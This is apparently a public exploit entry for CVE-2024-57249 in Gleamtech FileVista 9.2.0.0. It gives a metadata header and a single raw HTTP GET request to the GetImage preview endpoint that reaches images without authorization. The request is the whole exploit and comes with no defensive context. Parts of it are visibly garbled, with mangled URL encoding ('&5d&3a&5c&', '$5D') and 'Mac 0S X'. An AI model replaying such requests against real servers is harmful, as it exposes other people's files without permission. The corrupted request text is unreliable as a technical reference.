# Exploit Title: Gleamtech FileVista 9.2.0.0 - Unauthorized Access Preview Image Function
# Date: Feb 6, 2025
# Exploit Author: Suthiwat Thepsorn , Theerachai Chanwiroon , Pongtorn Angsuchotmetee 
# Vendor Homepage: https://www.gleamtech.com/
# Software Link: https://demos.gleamtech.com/filevista/
# Version: 9.2.0.0
# Tested on: macOS
# CVE : CVE-2024-57249

GET /filevista/filemanager.ashx/GetImage?stateId=f42jmy&path=85b1.+Root+Folder&5d&3a&5c&
fileName=Spotlight+1-Narrow.jpg&vary=638667480595383765&sid-gt=eizpoo0jqwbrvx2vcscb3rbd HTTP/2
Host: demos.gleamtech.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0S X 10.15; rv:132.0) Gecko/20100101
Firefox/132.0
Accept: image/avif, image/webp,image/png,image/svg+xml, image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate, br 
Referer: https://demos.gleamtech.com/filevista/filemanager.ashx/Preview?path=%5B1.820Root&20Folder$5D&3A&5C&fileName=Spotlight%201-Narrow.jpg&previewerType=ImageViewer&stateId=f42jmy
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Priority: u=5, i
Te: trailers